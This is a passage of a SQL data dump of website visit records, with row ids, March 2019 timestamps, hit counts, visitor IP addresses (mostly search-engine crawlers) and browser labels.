,(399200,1552508555,1,1,0,0,'8.29.198.25','other'),(399201,1552508556,1,1,0,0,'54.36.148.110','other'),(399202,1552508770,1,1,0,0,'157.55.39.230','other'),(399203,1552508829,1,1,0,0,'178.154.244.11','other'),(399204,1552508881,1,1,0,0,'66.249.64.29','chrome'),(399205,1552509374,1,1,0,0,'180.76.15.26','other'),(399206,1552509505,1,1,0,0,'54.36.150.71','other'),(399207,1552509763,1,1,0,0,'46.229.168.141','other'),(399208,1552510576,1,1,0,0,'54.36.149.9','other'),(399209,1552510600,1,1,0,0,'54.36.149.85','other'),(399210,1552510800,1,1,0,0,'54.36.148.168','other'),(399211,1552511315,3,3,0,0,'207.46.13.100','other'),(399212,1552511845,1,1,0,0,'66.249.64.31','chrome'),(399213,1552511933,1,1,0,0,'54.36.150.79','other'),(399214,1552512051,1,1,0,0,'54.36.148.229','other'),(399215,1552512403,1,1,0,0,'54.36.149.32','other'),(399216,1552512858,1,1,0,0,'54.36.148.93','other'),(399217,1552513055,1,1,0,0,'54.36.149.94','other'),(399218,1552513485,125,125,0,0,'148.251.244.137','other'),(399219,1552513865,1,1,0,0,'37.9.113.148','other'),(399220,1552513965,2,2,0,0,'5.45.207.19','other'),(399221,1552514057,1,1,0,0,'46.229.168.144','other'),(399222,1552514119,1,1,0,0,'54.36.148.210','other'),(399223,1552514172,1,1,0,0,'54.36.149.64','other'),(399224,1552514391,1,1,0,0,'54.36.149.106','other'),(399225,1552514640,1,1,0,0,'54.36.148.209','other'),(399226,1552514825,1,1,0,0,'141.8.142.103','other'),(399227,1552514949,1,1,0,0,'5.45.207.79','other'),(399228,1552515409,1,1,0,0,'54.36.150.161','other'),(399229,1552515414,1,1,0,0,'54.36.148.107','other'),(399230,1552515512,1,1,0,0,'216.244.66.241','other'),(399231,1552515917,2,2,0,0,'66.249.64.29','chrome'),(399232,1552515940,1,1,0,0,'54.36.150.81','other'),(399233,1552516036,1,1,0,0,'54.36.148.142','other'),(399234,1552516405,1,1,0,0,'5.45.207.79','other'),(399235,1552516489,1,1,0,0,'66.249.64.58','chrome'),(399236,1552516630,1,1,0,0,'54.36.148.192','other'),(399237,1552516718,1,1,0,0,'54.36.149.31','other'),(399238,1552517289,1,1,0,0,'207.46.13.32','other'),(399239,1552517496,1,1,0,0,'54.36.149.93','other'),(399240,1552517634,1,1,0,0,'40.77.167.177','other'),(399241,1552518237,1,1,0,0,'54.36.148.108','other'),(399242,1552518299,1,1,0,0,'216.244.66.241','other'),(399243,1552518552,1,1,0,0,'54.36.148.32','other'),(399244,1552518625,1,1,0,0,'54.36.148.128','other'),(399245,1552518733,1,1,0,0,'54.36.149.49','other'),(399246,1552519038,1,1,0,0,'46.229.168.132','other'),(399247,1552519375,1,1,0,0,'8.29.198.27','other'),(399248,1552519397,1,1,0,0,'8.29.198.25','other'),(399249,1552519743,1,1,0,0,'54.36.149.107','other'),(399250,1552519944,1,1,0,0,'46.229.168.146','other'),(399251,1552520350,1,1,0,0,'46.229.168.141','other'),(399252,1552520894,1,1,0,0,'66.249.64.29','chrome'),(399253,1552520895,1,1,0,0,'54.36.149.27','other'),(399254,1552521383,1,1,0,0,'5.45.207.79','other'),(399255,1552521472,1,1,0,0,'54.36.148.73','other'),(399256,1552521750,1,1,0,0,'54.36.148.180','other'),(399257,1552521888,1,1,0,0,'87.250.224.47','other'),(399258,1552521898,1,1,0,0,'54.36.148.242','other'),(399259,1552522306,1,1,0,0,'54.36.148.143','other'),(399260,1552522438,1,1,0,0,'207.46.13.199','other'),(399261,1552522450,1,1,0,0,'54.36.150.171','other'),(399262,1552522772,1,1,0,0,'54.36.149.67','other'),(399263,1552522996,1,1,0,0,'207.46.13.150','other'),(399264,1552523080,1,1,0,0,'178.154.244.11','other'),(399265,1552523213,1,1,0,0,'66.249.64.31','chrome'),(399266,1552523342,1,1,0,0,'54.36.150.145','other'),(399267,1552523375,1,1,0,0,'46.229.168.150','other'),(399268,1552523400,1,1,0,0,'46.229.168.132','other'),(399269,1552523665,1,1,0,0,'54.36.148.50','other'),(399270,1552523673,1,1,0,0,'54.36.149.51','other'),(399271,1552524079,1,1,0,0,'54.36.148.171','other'),(399272,1552524275,1,1,0,0,'66.249.64.31','chrome'),(399273,1552524329,1,1,0,0,'180.76.15.139','other'),(399274,1552524624,1,1,0,0,'5.45.207.79','other'),(399275,1552524719,1,1,0,0,'207.46.13.92','other'),(399276,1552525297,1,1,0,0,'207.46.13.137','other'),(399277,1552525392,1,1,0,0,'207.46.13.17','other'),(399278,1552525470,1,1,0,0,'5.45.207.19','other'),(399279,1552525529,1,1,0,0,'54.36.149.98','other'),(399280,1552525922,1,1,0,0,'87.250.224.47','other'),(399281,1552526154,2,2,0,0,'66.249.64.30','chrome'),(399282,1552526347,1,1,0,0,'141.8.142.103','other'),(399283,1552526353,1,1,0,0,'54.36.150.179','other'),(399284,1552526646,2,2,0,0,'216.244.66.241','other'),(399285,1552526657,1,1,0,0,'207.46.13.117','other'),(399286,1552527341,1,1,0,0,'207.46.13.137','other'),(399287,1552527458,1,1,0,0,'54.36.150.102','other'),(399288,1552527463,1,1,0,0,'54.36.149.89','other'),(399289,1552527469,2,2,0,0,'207.46.13.17','other'),(399290,1552527608,1,1,0,0,'46.229.168.144','other'),(399291,1552527958,1,1,0,0,'66.249.64.29','chrome'),(399292,1552528119,1,1,0,0,'54.36.148.233','other'),(399293,1552528138,4,4,0,0,'178.154.244.11','other'),(399294,1552528231,1,1,0,0,'46.229.168.143','other'),(399295,1552528822,2,2,0,0,'5.45.207.79','other'),(399296,1552528865,2,2,0,0,'5.45.207.19','other'),(399297,1552529011,1,1,0,0,'40.77.167.24','other'),(399298,1552529246,1,1,0,0,'207.46.13.117','other'),(399299,1552529378,1,1,0,0,'66.249.64.31','chrome'),(399300,1552530216,1,1,0,0,'54.36.150.174','other'),(399301,1552530217,2,2,0,0,'8.29.198.27','other'),(399302,1552530240,1,1,0,0,'46.229.168.137','other'),(399303,1552530485,1,1,0,0,'141.8.142.103','other'),(399304,1552530639,1,1,0,0,'54.36.150.51','other'),(399305,1552530945,1,1,0,0,'207.46.13.17','other'),(399306,1552531313,1,1,0,0,'46.229.168.142','other'),(399307,1552531693,1,1,0,0,'54.36.150.185','other'),(399308,1552532212,1,1,0,0,'54.36.150.26','other'),(399309,1552532578,1,1,0,0,'46.229.168.132','other'),(399310,1552532634,1,1,0,0,'54.36.148.177','other'),(399311,1552533068,2,2,0,0,'46.229.168.144','other'),(399312,1552533595,1,1,0,0,'46.229.168.147','other'),(399313,1552533738,2,2,0,0,'207.46.13.220','other'),(399314,1552533777,1,1,0,0,'46.229.168.145','other'),(399315,1552533850,1,1,0,0,'207.46.13.17','other'),(399316,1552534228,1,1,0,0,'66.249.64.30','chrome'),(399317,1552534372,2,2,0,0,'216.244.66.241','other'),(399318,1552534672,1,1,0,0,'45.40.127.236','chrome'),(399319,1552534830,1,1,0,0,'54.36.148.145','other'),(399320,1552534937,44,44,0,0,'173.208.206.50','other'),(399321,1552534944,1,1,0,0,'141.8.142.144','other'),(399322,1552534948,1,1,0,0,'141.8.142.38','other'),(399323,1552535005,1,1,0,0,'87.250.224.65','other'),(399324,1552535033,1,1,0,0,'66.249.64.60','chrome'),(399325,1552535090,1,1,0,0,'5.45.207.19','other'),(399326,1552535535,1,1,0,0,'54.36.150.11','other'),(399327,1552535851,1,1,0,0,'54.36.150.7','other'),(399328,1552535993,1,1,0,0,'207.46.13.222','other'),(399329,1552536334,1,1,0,0,'54.36.148.182','other'),(399330,1552536829,1,1,0,0,'54.36.148.57','other'),(399331,1552536881,1,1,0,0,'178.154.244.11','other'),(399332,1552537108,1,1,0,0,'54.36.148.233','other'),(399333,1552537578,1,1,0,0,'54.36.149.102','other'),(399334,1552537687,1,1,0,0,'207.46.13.17','other'),(399335,1552537715,1,1,0,0,'54.36.148.78','other'),(399336,1552537811,1,1,0,0,'54.36.148.161','other'),(399337,1552538021,1,1,0,0,'46.229.168.151','other'),(399338,1552538380,40,40,0,0,'213.239.216.194','other'),(399339,1552538483,1,1,0,0,'54.36.149.82','other'),(399340,1552538606,1,1,0,0,'207.46.13.17','other'),(399341,1552538671,1,1,0,0,'54.36.150.56','other'),(399342,1552539003,1,1,0,0,'207.46.13.222','other'),(399343,1552539424,2,2,0,0,'34.220.122.222','chrome'),(399344,1552539471,1,1,0,0,'54.36.150.173','other'),(399345,1552539934,1,1,0,0,'207.46.13.220','other'),(399346,1552540116,1,1,0,0,'54.36.150.151','other'),(399347,1552540185,117,117,0,0,'204.12.197.234','other'),(399348,1552540774,1,1,0,0,'54.36.150.12','other'),(399349,1552540801,300,300,0,0,'5.9.155.226','other'),(399350,1552540854,1,1,0,0,'207.46.13.222','other'),(399351,1552541067,1,1,0,0,'8.29.198.26','other'),(399352,1552541087,1,1,0,0,'8.29.198.25','other'),(399353,1552541090,1,1,0,0,'54.36.150.78','other'),(399354,1552541093,1,1,0,0,'54.36.150.68','other'),(399355,1552541096,39,39,0,0,'204.12.197.234','other'),(399356,1552541098,27,27,0,0,'213.239.216.194','other'),(399358,1552541100,299,299,0,0,'5.9.97.200','other'),(399359,1552541124,1,1,0,0,'46.229.168.143','other'),(399360,1552541175,1,1,0,0,'54.36.148.154','other'),(399361,1552541569,1,1,0,0,'54.36.148.81','other'),(399362,1552541788,1,1,0,0,'54.36.148.53','other'),(399363,1552541798,1,1,0,0,'54.36.150.41','other'),(399364,1552541941,1,1,0,0,'54.36.148.52','other'),(399365,1552541987,1,1,0,0,'54.36.148.184','other'),(399366,1552542159,2,2,0,0,'87.250.224.47','other'),(399367,1552542186,1,1,0,0,'141.8.142.103','other'),(399368,1552542242,1,1,0,0,'207.46.13.117','other'),(399369,1552542304,1,1,0,0,'54.36.149.19','other'),(399370,1552542413,1,1,0,0,'216.244.66.241','other'),(399371,1552542592,1,1,0,0,'66.249.64.60','chrome'),(399372,1552542914,1,1,0,0,'66.249.64.58','chrome'),(399373,1552542961,1,1,0,0,'95.163.255.47','other'),(399374,1552543154,1,1,0,0,'40.77.167.29','other'),(399375,1552543225,1,1,0,0,'46.229.168.149','other'),(399376,1552543232,1,1,0,0,'52.53.201.78','chrome'),(399377,1552543451,1,1,0,0,'91.196.178.89','chrome'),(399378,1552543817,1,1,0,0,'66.249.64.29','chrome'),(399379,1552543910,1,1,0,0,'54.36.149.82','other'),(399380,1552544605,1,1,0,0,'54.36.148.51','other'),(399381,1552544832,1,1,0,0,'185.220.101.70','other'),(399382,1552544956,1,1,0,0,'95.108.213.4','other'),(399383,1552545106,1,1,0,0,'66.249.64.30','chrome'),(399384,1552545178,1,1,0,0,'157.55.39.134','other'),(399385,1552545188,1,1,0,0,'54.36.148.78','other'),(399386,1552545266,1,1,0,0,'54.36.148.93','other'),(399387,1552545630,1,1,0,0,'91.196.178.89','chrome'),(399388,1552546043,1,1,0,0,'54.36.150.134','other'),(399389,1552546582,1,1,0,0,'54.36.148.226','other'),(399390,1552546715,1,1,0,0,'46.211.1.12','chrome'),(399391,1552546929,2,2,0,0,'5.45.207.79','other'),(399392,1552547003,1,1,0,0,'54.36.148.78','other'),(399393,1552547054,1,1,0,0,'54.36.149.91','other'),(399394,1552547079,1,1,0,0,'54.36.148.76','other'),(399395,1552547088,1,1,0,0,'54.36.148.67','other'),(399396,1552547451,1,1,0,0,'54.36.148.236','other'),(399397,1552547510,1,1,0,0,'40.77.167.157','other'),(399398,1552547537,1,1,0,0,'54.36.150.175','other'),(399399,1552547975,1,1,0,0,'66.249.64.30','chrome'),(399400,1552548397,1,1,0,0,'54.36.150.144','other'),(399401,1552548456,1,1,0,0,'54.36.148.1','other'),(399402,1552548498,1,1,0,0,'46.229.168.148','other'),(399403,1552548509,1,1,0,0,'216.244.66.241','other'),(399404,1552548539,1,1,0,0,'46.229.168.138','other'),(399405,1552548959,1,1,0,0,'54.36.148.210','other'),(399406,1552549140,1,1,0,0,'46.229.168.150','other'),(399407,1552549389,1,1,0,0,'91.196.178.187','chrome'),(399408,1552549479,1,1,0,0,'54.36.148.94','other'),(399409,1552549764,1,1,0,0,'46.229.168.143','other'),(399410,1552549939,1,1,0,0,'91.196.178.89','chrome'),(399411,1552550009,1,1,0,0,'54.36.148.120','other'),(399412,1552550027,1,1,0,0,'54.36.150.138','other'),(399413,1552550246,1,1,0,0,'46.211.51.220','chrome'),(399414,1552550495,1,1,0,0,'207.46.13.209','other'),(399415,1552550525,1,1,0,0,'40.77.167.165','other'),(399416,1552550972,1,1,0,0,'216.244.66.241','other'),(399417,1552551007,2,2,0,0,'13.66.139.0','other'),(399418,1552551156,1,1,0,0,'46.229.168.147','other'),(399419,1552551462,1,1,0,0,'46.229.168.141','other'),(399420,1552551546,1,1,0,0,'54.36.148.21','other'),(399421,1552551895,1,1,0,0,'91.209.11.236','other'),(399422,1552551924,1,1,0,0,'8.29.198.27','other'),(399423,1552551929,1,1,0,0,'8.29.198.26','other'),(399424,1552551994,1,1,0,0,'40.77.167.165','other'),(399425,1552552034,1,1,0,0,'54.36.148.249','other'),(399426,1552552081,1,1,0,0,'54.36.150.83','other'),(399427,1552552227,1,1,0,0,'5.45.207.8','other'),(399428,1552552260,2,2,0,0,'87.250.224.47','other'),(399429,1552552408,1,1,0,0,'37.9.113.148','other'),(399430,1552552480,1,1,0,0,'54.36.148.131','other'),(399431,1552552638,1,1,0,0,'178.154.244.11','other'),(399432,1552552658,1,1,0,0,'54.36.150.64','other'),(399433,1552552847,1,1,0,0,'46.229.168.137','other'),(399434,1552553030,1,1,0,0,'46.229.168.135','other'),(399435,1552553179,1,1,0,0,'54.36.149.40','other'),(399436,1552553365,1,1,0,0,'40.77.167.157','other'),(399437,1552553366,1,1,0,0,'91.221.74.150','chrome'),(399438,1552553481,1,1,0,0,'54.36.148.194','other'),(399439,1552553841,1,1,0,0,'95.221.185.142','chrome'),(399440,1552553896,1,1,0,0,'176.15.19.105','chrome'),(399441,1552554357,1,1,0,0,'46.229.168.129','other'),(399442,1552554574,1,1,0,0,'54.36.149.66','other'),(399443,1552554719,1,1,0,0,'42.236.10.114','chrome'),(399444,1552554812,1,1,0,0,'95.132.60.85','firefox'),(399445,1552554957,1,0,1,0,'66.249.64.29',''),(399446,1552555059,1,1,0,0,'54.36.150.32','other'),(399447,1552555131,41,41,0,0,'167.86.70.144','other'),(399448,1552555698,1,1,0,0,'178.154.244.11','other'),(399449,1552556166,1,1,0,0,'42.236.10.117','other'),(399450,1552556213,1,1,0,0,'5.45.207.19','other'),(399451,1552556625,2,2,0,0,'40.77.167.165','other'),(399452,1552556887,1,1,0,0,'54.36.149.6','other'),(399453,1552557330,1,1,0,0,'46.229.168.152','other'),(399454,1552557470,1,1,0,0,'54.36.148.163','other'),(399455,1552557511,1,1,0,0,'54.36.148.85','other'),(399456,1552557857,1,1,0,0,'54.36.149.7','other'),(399457,1552557877,1,1,0,0,'54.36.148.217','other'),(399458,1552557921,1,1,0,0,'66.249.64.30','chrome'),(399459,1552557923,1,1,0,0,'54.36.150.95','other'),(399460,1552557998,16,16,0,0,'167.86.70.144','other'),(399461,1552558017,1,1,0,0,'54.36.150.76','other'),(399462,1552558451,1,1,0,0,'46.229.168.152','other'),(399463,1552558513,1,1,0,0,'91.196.178.173','chrome'),(399464,1552558600,1,1,0,0,'54.36.149.86','other'),(399465,1552558621,1,1,0,0,'95.163.255.43','other'),(399466,1552558662,1,1,0,0,'54.36.148.104','other'),(399467,1552559252,1,1,0,0,'54.36.148.141','other'),(399468,1552559308,1,1,0,0,'46.229.168.135','other'),(399469,1552559407,1,1,0,0,'54.36.150.116','other'),(399470,1552559707,1,1,0,0,'46.229.168.143','other'),(399471,1552560057,1,1,0,0,'54.36.150.74','other'),(399472,1552560320,1,1,0,0,'95.135.240.118','chrome'),(399473,1552560438,1,1,0,0,'40.77.167.165','other'),(399474,1552560760,1,1,0,0,'95.164.69.4','chrome'),(399475,1552561177,2,2,0,0,'66.249.64.31','chrome'),(399476,1552561188,1,1,0,0,'54.36.150.178','other'),(399477,1552561468,3,3,0,0,'37.9.113.103','other'),(399478,1552561550,1,1,0,0,'95.108.213.4','other'),(399479,1552561582,1,1,0,0,'54.36.150.191','other'),(399480,1552561673,1,1,0,0,'207.46.13.80','other'),(399481,1552561839,1,1,0,0,'95.134.202.37','chrome'),(399482,1552561871,1,1,0,0,'54.36.148.212','other'),(399483,1552561875,1,1,0,0,'54.36.149.40','other'),(399484,1552562310,1,1,0,0,'46.229.168.136','other'),(399485,1552562341,1,1,0,0,'207.46.13.83','other'),(399486,1552562402,1,1,0,0,'54.36.148.5','other'),(399487,1552562474,1,1,0,0,'178.154.244.49','other'),(399488,1552562546,1,1,0,0,'5.45.207.19','other'),(399489,1552562781,2,2,0,0,'8.29.198.25','other'),(399490,1552562865,1,1,0,0,'54.36.150.166','other'),(399491,1552563164,1,1,0,0,'54.36.148.110','other'),(399492,1552563225,2,2,0,0,'216.244.66.241','other'),(399493,1552563285,1,1,0,0,'23.103.64.39','other'),(399494,1552563528,1,1,0,0,'46.211.110.51','chrome'),(399495,1552563864,1,1,0,0,'157.55.39.121','other'),(399496,1552563945,1,1,0,0,'54.36.148.231','other'),(399497,1552563996,2,2,0,0,'46.229.168.140','other'),(399498,1552564498,1,1,0,0,'157.55.39.2','other'),(399499,1552564564,1,1,0,0,'54.36.148.124','other'),(399500,1552564933,1,1,0,0,'54.36.149.62','other'),(399501,1552565444,1,1,0,0,'157.55.39.121','other'),(399502,1552565541,1,1,0,0,'46.229.168.145','other'),(399503,1552565955,2,2,0,0,'157.55.39.2','other'),(399504,1552566319,2,2,0,0,'216.244.66.241','other'),(399505,1552566580,1,1,0,0,'54.36.150.66','other'),(399506,1552566601,1,1,0,0,'54.36.148.70','other'),(399507,1552566953,1,1,0,0,'91.196.178.173','chrome'),(399508,1552567251,1,1,0,0,'157.55.39.10','other'),(399509,1552567322,1,1,0,0,'157.55.39.2','other'),(399510,1552567354,1,1,0,0,'54.36.148.68','other'),(399511,1552567508,1,1,0,0,'54.36.150.50','other'),(399512,1552567889,1,1,0,0,'5.45.207.79','other'),(399513,1552568006,1,1,0,0,'141.8.142.103','other'),(399514,1552568016,1,1,0,0,'54.36.148.134','other'),(399515,1552568096,1,1,0,0,'54.36.149.74','other'),(399516,1552568171,1,1,0,0,'178.154.244.11','other'),(399517,1552568846,1,1,0,0,'66.249.64.62','chrome'),(399518,1552569099,1,1,0,0,'54.36.149.49','other'),(399519,1552569110,1,1,0,0,'54.36.150.90','other'),(399520,1552569213,1,1,0,0,'46.229.168.144','other'),(399521,1552569430,1,1,0,0,'216.244.66.241','other'),(399522,1552569542,1,1,0,0,'128.0.105.207','chrome'),(399523,1552569701,2,2,0,0,'66.249.64.31','chrome'),(399524,1552569861,1,1,0,0,'66.249.64.62','chrome'),(399525,1552570040,1,1,0,0,'54.36.148.0','other'),(399526,1552570042,1,1,0,0,'66.249.64.30','chrome'),(399527,1552570215,1,1,0,0,'95.163.255.43','other'),(399528,1552570571,1,1,0,0,'66.249.64.29','chrome'),(399529,1552571524,1,1,0,0,'54.36.148.181','other'),(399530,1552571571,1,1,0,0,'194.44.65.5','chrome'),(399531,1552572051,1,1,0,0,'216.244.66.241','other'),(399532,1552572303,1,1,0,0,'54.36.148.207','other'),(399533,1552572364,1,1,0,0,'54.36.149.47','other'),(399534,1552572478,1,1,0,0,'207.46.13.134','other'),(399535,1552572808,2,2,0,0,'157.55.39.10','other'),(399536,1552573225,1,1,0,0,'108.59.8.80','other'),(399537,1552573255,1,1,0,0,'54.36.150.92','other'),(399538,1552573498,3,3,0,0,'66.249.64.29','chrome'),(399539,1552573637,1,1,0,0,'193.19.252.242','chrome'),(399540,1552573639,1,1,0,0,'8.29.198.27','other'),(399541,1552573643,1,1,0,0,'8.29.198.25','other'),(399542,1552573776,1,1,0,0,'95.132.34.18','firefox'),(399543,1552574577,1,1,0,0,'178.133.43.175','chrome'),(399544,1552574614,1,1,0,0,'216.244.66.241','other'),(399545,1552574696,1,1,0,0,'207.46.13.134','other'),(399546,1552574743,1,1,0,0,'46.229.168.136','other'),(399547,1552574773,1,1,0,0,'54.36.149.50','other'),(399548,1552574864,1,1,0,0,'157.55.39.121','other'),(399549,1552574874,1,1,0,0,'66.249.64.30','chrome'),(399550,1552575081,1,1,0,0,'54.36.150.163','other'),(399551,1552575354,1,1,0,0,'46.96.35.106','chrome'),(399552,1552575680,1,1,0,0,'66.249.64.31','chrome'),(399553,1552575695,1,1,0,0,'66.249.64.29','chrome'),(399554,1552575778,1,1,0,0,'157.55.39.10','other'),(399555,1552575940,1,1,0,0,'54.36.150.113','other'),(399556,1552576142,1,1,0,0,'46.229.168.134','other'),(399557,1552576230,1,1,0,0,'54.36.148.13','other'),(399558,1552576477,1,1,0,0,'46.229.168.143','other'),(399559,1552576608,1,1,0,0,'46.229.168.152','other'),(399560,1552576694,1,1,0,0,'54.36.150.125','other'),(399561,1552576968,1,1,0,0,'66.249.64.31','chrome'),(399562,1552576976,1,1,0,0,'157.55.39.121','other'),(399563,1552577123,1,1,0,0,'54.36.150.100','other'),(399564,1552577170,2,2,0,0,'216.244.66.241','other'),(399565,1552577341,1,1,0,0,'66.249.64.29','chrome'),(399566,1552577385,1,1,0,0,'54.36.150.3','other'),(399567,1552577482,1,1,0,0,'46.211.115.178','chrome'),(399568,1552577829,1,1,0,0,'46.229.168.151','other'),(399569,1552577839,2,2,0,0,'66.249.64.30','chrome'),(399570,1552577887,1,1,0,0,'66.249.64.58','chrome'),(399571,1552577892,1,1,0,0,'54.36.148.212','other'),(399572,1552578084,1,1,0,0,'66.249.64.31','chrome'),(399573,1552578197,1,1,0,0,'54.36.148.26','other'),(399574,1552578232,1,1,0,0,'54.36.150.153','other'),(399575,1552578512,1,1,0,0,'46.229.168.130','other'),(399576,1552578543,1,1,0,0,'157.55.39.10','other'),(399577,1552578667,1,1,0,0,'54.36.148.232','other'),(399578,1552578752,1,1,0,0,'46.229.168.136','other'),(399579,1552578932,35,35,0,0,'144.76.186.38','other'),(399580,1552579227,1,1,0,0,'207.46.13.83','other'),(399581,1552579244,57,57,0,0,'95.216.11.34','other'),(399582,1552579379,1,1,0,0,'54.36.150.160','other'),(399583,1552579455,1,1,0,0,'54.36.150.145','other'),(399584,1552579575,1,1,0,0,'91.196.178.91','other'),(399585,1552579581,1,1,0,0,'54.36.149.4','other'),(399586,1552579975,1,1,0,0,'54.36.150.53','other'),(399587,1552579983,1,0,1,0,'66.249.64.29',''),(399588,1552580063,2,2,0,0,'66.249.64.29','chrome'),(399589,1552580137,1,1,0,0,'207.46.13.134','other'),(399590,1552580152,1,1,0,0,'216.244.66.241','other'),(399591,1552580678,1,1,0,0,'180.76.15.18','other'),(399592,1552580687,1,1,0,0,'54.36.150.21','other'),(399593,1552581080,1,1,0,0,'54.36.148.227','other'),(399594,1552582677,1,1,0,0,'180.76.15.19','other'),(399595,1552583477,1,1,0,0,'31.43.254.14','firefox'),(399596,1552583862,1,1,0,0,'54.36.148.84','other'),(399597,1552583874,1,1,0,0,'54.36.149.36','other'),(399598,1552584099,1,1,0,0,'157.55.39.121','other'),(399599,1552584487,1,1,0,0,'8.29.198.27','other'),(399600,1552584491,1,1,0,0,'8.29.198.25','other'),(399601,1552584516,1,1,0,0,'207.46.13.206','other'),(399602,1552584519,1,1,0,0,'54.36.148.106','other'),(399603,1552584761,1,1,0,0,'141.8.142.103','other'),(399604,1552584916,1,1,0,0,'66.249.66.60','chrome'),(399605,1552585083,1,1,0,0,'5.45.207.19','other'),(399606,1552585136,1,1,0,0,'54.36.150.170','other'),(399607,1552585149,1,1,0,0,'95.108.213.4','other'),(399608,1552585183,1,1,0,0,'212.1.93.97','chrome'),(399609,1552585364,1,1,0,0,'178.154.244.11','other'),(399610,1552585417,1,1,0,0,'157.55.39.121','other'),(399611,1552585515,1,1,0,0,'54.36.148.157','other'),(399612,1552585556,1,1,0,0,'54.36.148.125','other'),(399613,1552585591,2,2,0,0,'66.249.66.142','chrome'),(399614,1552585617,1,1,0,0,'185.138.228.118','firefox'),(399615,1552585635,1,1,0,0,'54.36.148.146','other'),(399616,1552585725,1,1,0,0,'5.45.207.79','other'),(399617,1552585809,1,1,0,0,'54.36.148.118','other'),(399618,1552585885,1,1,0,0,'46.229.168.137','other'),(399619,1552586008,1,1,0,0,'40.77.167.221','other'),(399620,1552586060,1,1,0,0,'87.250.224.47','other'),(399621,1552586062,1,1,0,0,'54.36.150.10','other'),(399622,1552586068,1,1,0,0,'46.229.168.138','other'),(399623,1552586509,1,1,0,0,'54.36.148.13','other'),(399624,1552587664,2,2,0,0,'66.249.66.134','chrome'),(399625,1552587689,1,1,0,0,'216.244.66.241','other'),(399626,1552587717,1,1,0,0,'54.36.148.193','other'),(399628,1552587855,3,3,0,0,'66.249.66.136','chrome'),(399629,1552587910,1,1,0,0,'66.249.66.138','chrome'),(399630,1552588240,1,1,0,0,'54.36.149.60','other'),(399631,1552588290,1,1,0,0,'157.55.39.151','other'),(399632,1552588628,1,1,0,0,'46.229.168.140','other'),(399633,1552588745,1,1,0,0,'157.55.39.88','other'),(399634,1552589073,1,1,0,0,'40.77.167.32','other'),(399635,1552589682,1,0,1,0,'51.68.152.26',''),(399636,1552589850,1,1,0,0,'54.36.150.152','other'),(399637,1552589851,1,1,0,0,'66.249.66.58','chrome'),(399638,1552590243,1,1,0,0,'54.36.148.65','other'),(399639,1552590387,1,1,0,0,'46.229.168.149','other'),(399640,1552590432,1,1,0,0,'216.244.66.241','other'),(399641,1552590552,1,1,0,0,'54.36.150.176','other'),(399642,1552590711,1,1,0,0,'40.77.167.32','other'),(399643,1552590803,1,1,0,0,'54.36.149.56','other'),(399644,1552591160,1,1,0,0,'54.36.150.157','other'),(399645,1552591272,1,1,0,0,'157.55.39.88','other'),(399646,1552591280,1,1,0,0,'66.249.66.138','chrome'),(399647,1552591463,1,1,0,0,'66.249.66.136','chrome'),(399648,1552591594,1,1,0,0,'46.229.168.132','other'),(399649,1552592123,1,1,0,0,'54.36.150.157','other'),(399650,1552592152,1,1,0,0,'157.55.39.63','other'),(399651,1552592243,1,1,0,0,'40.77.167.32','other'),(399652,1552592461,18,18,0,0,'80.241.211.186','other'),(399653,1552592463,1,1,0,0,'54.36.148.101','other'),(399654,1552592479,1,1,0,0,'54.36.150.23','other'),(399655,1552593307,2,2,0,0,'66.249.66.136','chrome'),(399656,1552593340,1,1,0,0,'46.229.168.129','other'),(399657,1552594141,1,1,0,0,'40.77.167.103','other'),(399658,1552594173,1,1,0,0,'54.36.148.12','other'),(399659,1552594183,1,1,0,0,'54.36.150.65','other'),(399660,1552594335,1,1,0,0,'54.36.148.255','other'),(399661,1552594399,1,1,0,0,'54.36.150.164','other'),(399662,1552594550,1,1,0,0,'176.104.3.182','chrome'),(399663,1552594664,1,1,0,0,'66.249.66.136','chrome'),(399664,1552595314,1,1,0,0,'5.45.207.19','other'),(399665,1552595327,1,1,0,0,'8.29.198.26','other'),(399666,1552595337,1,1,0,0,'8.29.198.25','other'),(399667,1552595379,1,1,0,0,'40.77.167.32','other'),(399668,1552595676,1,1,0,0,'54.36.149.37','other'),(399669,1552595727,1,1,0,0,'54.36.149.46','other'),(399670,1552595815,1,1,0,0,'54.36.148.152','other'),(399671,1552596161,1,1,0,0,'54.36.150.144','other'),(399672,1552596231,1,1,0,0,'54.36.149.78','other'),(399673,1552596643,1,1,0,0,'66.249.66.134','chrome'),(399674,1552596717,1,1,0,0,'66.249.66.138','chrome'),(399675,1552596765,1,1,0,0,'46.229.168.141','other'),(399676,1552596881,1,1,0,0,'54.36.150.106','other'),(399677,1552597615,1,1,0,0,'207.46.13.16','other'),(399678,1552597635,1,1,0,0,'66.249.66.138','chrome'),(399679,1552598778,1,1,0,0,'54.36.148.192','other'),(399680,1552598832,8,8,0,0,'69.30.221.250','other'),(399681,1552598984,1,1,0,0,'54.36.148.49','other'),(399682,1552599003,1,1,0,0,'157.55.39.189','other'),(399683,1552599171,2,2,0,0,'66.249.66.134','chrome'),(399684,1552599263,1,1,0,0,'46.211.72.24','chrome'),(399685,1552599406,1,1,0,0,'54.36.150.190','other'),(399686,1552599526,1,1,0,0,'54.36.148.251','other'),(399687,1552599577,1,1,0,0,'37.9.113.148','other'),(399688,1552599686,1,1,0,0,'66.249.66.136','chrome'),(399689,1552599750,1,1,0,0,'66.249.66.138','chrome'),(399690,1552599821,2,2,0,0,'5.45.207.79','other'),(399691,1552599945,1,1,0,0,'40.77.167.103','other'),(399692,1552599966,1,1,0,0,'54.36.148.227','other'),(399693,1552599968,1,1,0,0,'178.154.244.11','other'),(399694,1552600101,3,3,0,0,'66.249.66.134','chrome'),(399695,1552600171,1,1,0,0,'46.229.168.139','other'),(399696,1552600368,1,1,0,0,'157.55.39.189','other'),(399697,1552600387,1,1,0,0,'54.36.148.57','other'),(399698,1552600489,2,2,0,0,'141.8.142.103','other'),(399699,1552600875,2,2,0,0,'95.108.213.4','other'),(399700,1552600953,1,1,0,0,'54.36.148.29','other'),(399701,1552600979,1,1,0,0,'54.36.148.90','other'),(399702,1552601010,1,1,0,0,'5.45.207.19','other'),(399703,1552601208,1,1,0,0,'54.36.148.3','other'),(399704,1552601360,1,1,0,0,'66.249.66.62','chrome'),(399705,1552601571,1,1,0,0,'46.229.168.142','other'),(399706,1552601619,1,1,0,0,'54.36.150.71','other'),(399707,1552601624,1,1,0,0,'54.36.148.83','other'),(399708,1552601691,1,1,0,0,'54.36.148.12','other'),(399709,1552601729,1,1,0,0,'54.36.150.84','other'),(399710,1552601855,1,1,0,0,'66.249.66.134','chrome'),(399711,1552602137,1,1,0,0,'157.55.39.56','other'),(399712,1552602167,1,1,0,0,'157.55.39.55','other'),(399713,1552602254,1,1,